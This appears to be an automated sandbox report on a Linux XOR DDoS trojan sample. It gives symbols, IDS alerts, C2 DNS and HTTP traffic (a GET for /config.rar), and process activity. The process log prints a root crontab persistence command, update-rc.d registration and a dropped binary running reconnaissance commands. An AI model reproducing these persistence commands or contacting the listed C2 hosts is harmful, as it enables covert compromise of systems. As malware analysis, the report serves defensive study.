                                                                                __lll_unlock_wake_private.symtab0x805381037FUNC<unknown>HIDDEN3
                                                                                __llseek.symtab0x806ad50117FUNC<unknown>DEFAULT3
                                                                                __localtime_r.symtab0x8086e0034FUNC<unknown>DEFAULT3
                                                                                __longjmp.symtab0x80553b043FUNC<unknown>DEFAULT3
                                                                                __lseek.symtab0x8053d5033FUNC<unknown>DEFAULT3
                                                                                __lseek64.symtab0x806ad50117FUNC<unknown>DEFAULT3
                                                                                __make_stacks_executable.symtab0x8051210257FUNC<unknown>DEFAULT3
                                                                                __mallinfo.symtab0x8060a60353FUNC<unknown>DEFAULT3
                                                                                __malloc.symtab0x8063d30442FUNC<unknown>DEFAULT3
                                                                                __malloc_check_init.symtab0x8060000121FUNC<unknown>DEFAULT3
                                                                                __malloc_get_state.symtab0x8064180428FUNC<unknown>DEFAULT3
                                                                                __malloc_hook.symtab0x80cf9ec4OBJECT<unknown>DEFAULT21
                                                                                __malloc_initialize_hook.symtab0x80d4b404OBJECT<unknown>DEFAULT22
                                                                                __malloc_set_state.symtab0x8060dc0905FUNC<unknown>DEFAULT3
                                                                                __malloc_stats.symtab0x8060840529FUNC<unknown>DEFAULT3
                                                                                __malloc_trim.symtab0x8060bd0493FUNC<unknown>DEFAULT3
                                                                                __malloc_usable_size.symtab0x805f01052FUNC<unknown>DEFAULT3
                                                                                __mallopt.symtab0x8061150356FUNC<unknown>DEFAULT3
                                                                                __mbrlen.symtab0x808650055FUNC<unknown>DEFAULT3
                                                                                __mbrtowc.symtab0x8086540407FUNC<unknown>DEFAULT3
                                                                                __mbsnrtowcs.symtab0x8086ae0594FUNC<unknown>DEFAULT3
                                                                                __memalign.symtab0x8063ef0467FUNC<unknown>DEFAULT3
                                                                                __memalign_hook.symtab0x80cf9f44OBJECT<unknown>DEFAULT21
                                                                                __memchr.symtab0x8066760411FUNC<unknown>DEFAULT3
                                                                                __mempcpy.symtab0x8066a2068FUNC<unknown>DEFAULT3
                                                                                __mkdir.symtab0x8068d6031FUNC<unknown>DEFAULT3
                                                                                __mktime_internal.symtab0x809f3002437FUNC<unknown>DEFAULT3
                                                                                __mmap.symtab0x8069da067FUNC<unknown>DEFAULT3
                                                                                __mmap64.symtab0x8069df088FUNC<unknown>DEFAULT3
                                                                                __mon_yday.symtab0x80c72c052OBJECT<unknown>DEFAULT7
                                                                                __morecore.symtab0x80cf9e84OBJECT<unknown>DEFAULT21
                                                                                __mpn_add_n.symtab0x80aa690144FUNC<unknown>DEFAULT3
                                                                                __mpn_addmul_1.symtab0x80aa72060FUNC<unknown>DEFAULT3
                                                                                __mpn_cmp.symtab0x8096b6092FUNC<unknown>DEFAULT3
                                                                                __mpn_construct_double.symtab0x80aa7a086FUNC<unknown>DEFAULT3
                                                                                __mpn_construct_float.symtab0x80aa76049FUNC<unknown>DEFAULT3
                                                                                __mpn_construct_long_double.symtab0x80aa80071FUNC<unknown>DEFAULT3
                                                                                __mpn_divrem.symtab0x8096bc01112FUNC<unknown>DEFAULT3
                                                                                __mpn_extract_double.symtab0x80988b0244FUNC<unknown>DEFAULT3
                                                                                __mpn_extract_long_double.symtab0x80989b0279FUNC<unknown>DEFAULT3
                                                                                __mpn_impn_mul_n.symtab0x80976701989FUNC<unknown>DEFAULT3
                                                                                __mpn_impn_mul_n_basecase.symtab0x8097570247FUNC<unknown>DEFAULT3
                                                                                __mpn_impn_sqr_n.symtab0x8097e401829FUNC<unknown>DEFAULT3
                                                                                __mpn_impn_sqr_n_basecase.symtab0x8097470250FUNC<unknown>DEFAULT3
                                                                                __mpn_lshift.symtab0x809702087FUNC<unknown>DEFAULT3
                                                                                __mpn_mul.symtab0x80970e0843FUNC<unknown>DEFAULT3
                                                                                __mpn_mul_1.symtab0x809743057FUNC<unknown>DEFAULT3
                                                                                __mpn_mul_n.symtab0x8098570620FUNC<unknown>DEFAULT3
                                                                                __mpn_rshift.symtab0x809708087FUNC<unknown>DEFAULT3
                                                                                __mpn_sub_n.symtab0x80987e0144FUNC<unknown>DEFAULT3
                                                                                __mpn_submul_1.symtab0x809887060FUNC<unknown>DEFAULT3
                                                                                __mprotect.symtab0x8069e7033FUNC<unknown>DEFAULT3
                                                                                __mremap.symtab0x806add045FUNC<unknown>DEFAULT3
                                                                                __munmap.symtab0x8069e5031FUNC<unknown>DEFAULT3
                                                                                __nanosleep.symtab0x80677b087FUNC<unknown>DEFAULT3
                                                                                __nanosleep_nocancel.symtab0x80677ba31FUNC<unknown>DEFAULT3
                                                                                __new_exitfn.symtab0x8056000274FUNC<unknown>DEFAULT3
                                                                                __new_exitfn_called.symtab0x80d62408OBJECT<unknown>DEFAULT22
                                                                                __new_fclose.symtab0x8057df0439FUNC<unknown>DEFAULT3
                                                                                __new_fopen.symtab0x80582a034FUNC<unknown>DEFAULT3
                                                                                __new_getrlimit.symtab0x806903054FUNC<unknown>DEFAULT3
                                                                                __new_sem_init.symtab0x805332084FUNC<unknown>DEFAULT3
                                                                                __new_sem_post.symtab0x805342078FUNC<unknown>DEFAULT3
                                                                                __new_sem_wait.symtab0x8053380141FUNC<unknown>DEFAULT3
                                                                                __nptl_create_event.symtab0x80547005FUNC<unknown>DEFAULT3
                                                                                __nptl_deallocate_tsd.symtab0x8050980278FUNC<unknown>DEFAULT3
                                                                                __nptl_death_event.symtab0x80547105FUNC<unknown>DEFAULT3
                                                                                __nptl_initial_report_events.symtab0x80d20cc1OBJECT<unknown>DEFAULT22
                                                                                __nptl_last_event.symtab0x80d20c04OBJECT<unknown>DEFAULT22
                                                                                __nptl_nthreads.symtab0x80cf4f04OBJECT<unknown>DEFAULT21
                                                                                __nptl_setxid.symtab0x8050e60941FUNC<unknown>DEFAULT3
                                                                                __nptl_threads_events.symtab0x80d20b88OBJECT<unknown>DEFAULT22
                                                                                __offtime.symtab0x809f010746FUNC<unknown>DEFAULT3
                                                                                __open.symtab0x8053d8091FUNC<unknown>DEFAULT3
                                                                                __open_nocancel.symtab0x8053d8a33FUNC<unknown>DEFAULT3
                                                                                __opendir.symtab0x80672a0220FUNC<unknown>DEFAULT3
                                                                                __overflow.symtab0x805d81041FUNC<unknown>DEFAULT3
                                                                                __parse_one_specmb.symtab0x80834801320FUNC<unknown>DEFAULT3
                                                                                __pause_nocancel.symtab0x8053dea19FUNC<unknown>DEFAULT3
                                                                                __posix_memalign.symtab0x80640d0111FUNC<unknown>DEFAULT3
                                                                                __preinit_array_end.symtab0x80cf1200NOTYPE<unknown>HIDDEN14
                                                                                __preinit_array_start.symtab0x80cf1200NOTYPE<unknown>HIDDEN14
                                                                                __printf_arginfo_table.symtab0x80d63e04OBJECT<unknown>DEFAULT23
                                                                                __printf_fp.symtab0x807f6209363FUNC<unknown>DEFAULT3
                                                                                __printf_fphex.symtab0x8081b506104FUNC<unknown>DEFAULT3

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                07/20/21-00:23:42.805084UDP2021022ET TROJAN Wapack Labs Sinkhole DNS Reply53440918.8.8.8192.168.2.20
                                                                                07/20/21-00:23:42.944040TCP2021336ET TROJAN DDoS.XOR Checkin via HTTP5058680192.168.2.2023.253.46.64
                                                                                07/20/21-00:23:43.144887TCP2020381ET TROJAN DDoS.XOR Checkin3968853192.168.2.20204.11.56.48
                                                                                07/20/21-00:23:49.127614TCP2020381ET TROJAN DDoS.XOR Checkin4074253192.168.2.20104.161.25.33

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jul 20, 2021 00:23:42.805243015 CEST5058680192.168.2.2023.253.46.64
                                                                                Jul 20, 2021 00:23:42.811404943 CEST3968853192.168.2.20204.11.56.48
                                                                                Jul 20, 2021 00:23:42.943406105 CEST805058623.253.46.64192.168.2.20
                                                                                Jul 20, 2021 00:23:42.943850040 CEST5058680192.168.2.2023.253.46.64
                                                                                Jul 20, 2021 00:23:42.944040060 CEST5058680192.168.2.2023.253.46.64
                                                                                Jul 20, 2021 00:23:42.976809025 CEST5339688204.11.56.48192.168.2.20
                                                                                Jul 20, 2021 00:23:42.976954937 CEST3968853192.168.2.20204.11.56.48
                                                                                Jul 20, 2021 00:23:42.978272915 CEST3968853192.168.2.20204.11.56.48
                                                                                Jul 20, 2021 00:23:43.082765102 CEST805058623.253.46.64192.168.2.20
                                                                                Jul 20, 2021 00:23:43.082811117 CEST805058623.253.46.64192.168.2.20
                                                                                Jul 20, 2021 00:23:43.082962990 CEST5058680192.168.2.2023.253.46.64
                                                                                Jul 20, 2021 00:23:43.083184004 CEST5058680192.168.2.2023.253.46.64
                                                                                Jul 20, 2021 00:23:43.144798994 CEST5339688204.11.56.48192.168.2.20
                                                                                Jul 20, 2021 00:23:43.144886971 CEST3968853192.168.2.20204.11.56.48
                                                                                Jul 20, 2021 00:23:43.310609102 CEST5339688204.11.56.48192.168.2.20
                                                                                Jul 20, 2021 00:23:48.030004025 CEST3968853192.168.2.20204.11.56.48
                                                                                Jul 20, 2021 00:23:48.099642992 CEST5058680192.168.2.2023.253.46.64
                                                                                Jul 20, 2021 00:23:48.197186947 CEST5339688204.11.56.48192.168.2.20
                                                                                Jul 20, 2021 00:23:48.239253998 CEST805058623.253.46.64192.168.2.20
                                                                                Jul 20, 2021 00:23:48.239440918 CEST5058680192.168.2.2023.253.46.64
                                                                                Jul 20, 2021 00:23:48.315795898 CEST5339688204.11.56.48192.168.2.20
                                                                                Jul 20, 2021 00:23:48.315960884 CEST3968853192.168.2.20204.11.56.48
                                                                                Jul 20, 2021 00:23:48.463704109 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:23:48.691756010 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:23:48.694942951 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:23:48.694968939 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:23:48.845549107 CEST5339688204.11.56.48192.168.2.20
                                                                                Jul 20, 2021 00:23:48.845758915 CEST3968853192.168.2.20204.11.56.48
                                                                                Jul 20, 2021 00:23:49.126606941 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:23:49.127614021 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:23:49.349174023 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:23:49.353820086 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:23:49.357403040 CEST5339688204.11.56.48192.168.2.20
                                                                                Jul 20, 2021 00:23:49.359776974 CEST3968853192.168.2.20204.11.56.48
                                                                                Jul 20, 2021 00:23:50.381561995 CEST5339688204.11.56.48192.168.2.20
                                                                                Jul 20, 2021 00:23:50.381800890 CEST3968853192.168.2.20204.11.56.48
                                                                                Jul 20, 2021 00:23:52.429501057 CEST5339688204.11.56.48192.168.2.20
                                                                                Jul 20, 2021 00:23:52.429685116 CEST3968853192.168.2.20204.11.56.48
                                                                                Jul 20, 2021 00:23:59.578563929 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:23:59.582535982 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:24:00.110264063 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:24:00.110523939 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:24:10.342566013 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:24:10.342698097 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:24:20.576108932 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:24:20.576421976 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:24:30.794850111 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:24:30.795058012 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:24:35.179327011 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:24:35.179575920 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:24:45.396882057 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:24:45.397149086 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:24:55.613722086 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:24:55.614033937 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:25:05.831728935 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:25:05.831976891 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:25:10.247838020 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:25:10.248173952 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:25:20.464502096 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:25:20.464754105 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:25:30.682713985 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:25:30.682979107 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:25:40.916013956 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:25:40.916227102 CEST4074253192.168.2.20104.161.25.33
                                                                                Jul 20, 2021 00:25:45.317277908 CEST5340742104.161.25.33192.168.2.20
                                                                                Jul 20, 2021 00:25:45.317461014 CEST4074253192.168.2.20104.161.25.33

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jul 20, 2021 00:23:42.745662928 CEST4409153192.168.2.208.8.8.8
                                                                                Jul 20, 2021 00:23:42.750415087 CEST5183453192.168.2.208.8.8.8
                                                                                Jul 20, 2021 00:23:42.805083990 CEST53440918.8.8.8192.168.2.20
                                                                                Jul 20, 2021 00:23:42.811216116 CEST53518348.8.8.8192.168.2.20
                                                                                Jul 20, 2021 00:23:47.981594086 CEST4227953192.168.2.208.8.8.8
                                                                                Jul 20, 2021 00:23:48.194571972 CEST53422798.8.8.8192.168.2.20
                                                                                Jul 20, 2021 00:23:48.194963932 CEST3307153192.168.2.208.8.4.4
                                                                                Jul 20, 2021 00:23:48.402704954 CEST53330718.8.4.4192.168.2.20
                                                                                Jul 20, 2021 00:23:48.403228998 CEST3466553192.168.2.208.8.8.8
                                                                                Jul 20, 2021 00:23:48.463231087 CEST53346658.8.8.8192.168.2.20

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                Jul 20, 2021 00:23:42.745662928 CEST192.168.2.208.8.8.80x433Standard query (0)aaa.dsaj2a.orgA (IP address)IN (0x0001)
                                                                                Jul 20, 2021 00:23:42.750415087 CEST192.168.2.208.8.8.80x3404Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)
                                                                                Jul 20, 2021 00:23:47.981594086 CEST192.168.2.208.8.8.80xda69Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)
                                                                                Jul 20, 2021 00:23:48.194963932 CEST192.168.2.208.8.4.40xc5e3Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)
                                                                                Jul 20, 2021 00:23:48.403228998 CEST192.168.2.208.8.8.80x4e12Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                Jul 20, 2021 00:23:42.805083990 CEST8.8.8.8192.168.2.200x433No error (0)aaa.dsaj2a.org23.253.46.64A (IP address)IN (0x0001)
                                                                                Jul 20, 2021 00:23:42.811216116 CEST8.8.8.8192.168.2.200x3404No error (0)ww.dnstells.com204.11.56.48A (IP address)IN (0x0001)
                                                                                Jul 20, 2021 00:23:48.463231087 CEST8.8.8.8192.168.2.200x4e12No error (0)ww.gzcfr5axf6.com104.161.25.33A (IP address)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • aaa.dsaj2a.org

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                0192.168.2.205058623.253.46.6480
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 20, 2021 00:23:42.944040060 CEST0OUTGET /config.rar HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: zh-cn
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
                                                                                Host: aaa.dsaj2a.org
                                                                                Connection: Keep-Alive
                                                                                Jul 20, 2021 00:23:43.082765102 CEST2INHTTP/1.1 404 Not Found
                                                                                Content-Type: text/html
                                                                                Server: Microsoft-IIS/7.5
                                                                                X-Powered-By: ASP.NET
                                                                                Date: Mon, 19 Jul 2021 22:23:38 GMT
                                                                                Content-Length: 1245
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or i
                                                                                Jul 20, 2021 00:23:43.082811117 CEST2INData Raw: 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: s temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                System Behavior

                                                                                General

                                                                                Start time:00:23:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:/tmp/4ljhdTTyiA
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:41
                                                                                Start date:20/07/2021
                                                                                Path:/usr/sbin/update-rc.d
                                                                                Arguments:/usr/bin/perl /usr/sbin/update-rc.d 4ljhdTTyiA defaults
                                                                                File size:14437 bytes
                                                                                MD5 hash:e9e125904f9ed8ff4c8504a55a149005

                                                                                General

                                                                                Start time:00:23:41
                                                                                Start date:20/07/2021
                                                                                Path:/usr/sbin/update-rc.d
                                                                                Arguments:n/a
                                                                                File size:14437 bytes
                                                                                MD5 hash:e9e125904f9ed8ff4c8504a55a149005

                                                                                General

                                                                                Start time:00:23:41
                                                                                Start date:20/07/2021
                                                                                Path:/usr/lib/insserv/insserv
                                                                                Arguments:/usr/lib/insserv/insserv 4ljhdTTyiA
                                                                                File size:0 bytes
                                                                                MD5 hash:unknown

                                                                                General

                                                                                Start time:00:23:41
                                                                                Start date:20/07/2021
                                                                                Path:/usr/sbin/update-rc.d
                                                                                Arguments:n/a
                                                                                File size:14437 bytes
                                                                                MD5 hash:e9e125904f9ed8ff4c8504a55a149005

                                                                                General

                                                                                Start time:00:23:41
                                                                                Start date:20/07/2021
                                                                                Path:/bin/systemctl
                                                                                Arguments:systemctl daemon-reload
                                                                                File size:659848 bytes
                                                                                MD5 hash:b08096235b8c90203e17721264b5ce40

                                                                                General

                                                                                Start time:00:23:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:41
                                                                                Start date:20/07/2021
                                                                                Path:/bin/dash
                                                                                Arguments:sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
                                                                                File size:154072 bytes
                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                General

                                                                                Start time:00:23:41
                                                                                Start date:20/07/2021
                                                                                Path:/bin/dash
                                                                                Arguments:n/a
                                                                                File size:154072 bytes
                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                General

                                                                                Start time:00:23:41
                                                                                Start date:20/07/2021
                                                                                Path:/bin/sed
                                                                                Arguments:sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
                                                                                File size:0 bytes
                                                                                MD5 hash:unknown

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/jjltawydwf
                                                                                Arguments:/usr/bin/jjltawydwf "ls -la" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:8031cb3d4fe5ba13e55be0286e251729

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/jjltawydwf
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:8031cb3d4fe5ba13e55be0286e251729

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/jjltawydwf
                                                                                Arguments:/usr/bin/jjltawydwf "ifconfig eth0" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:8031cb3d4fe5ba13e55be0286e251729

                                                                                General

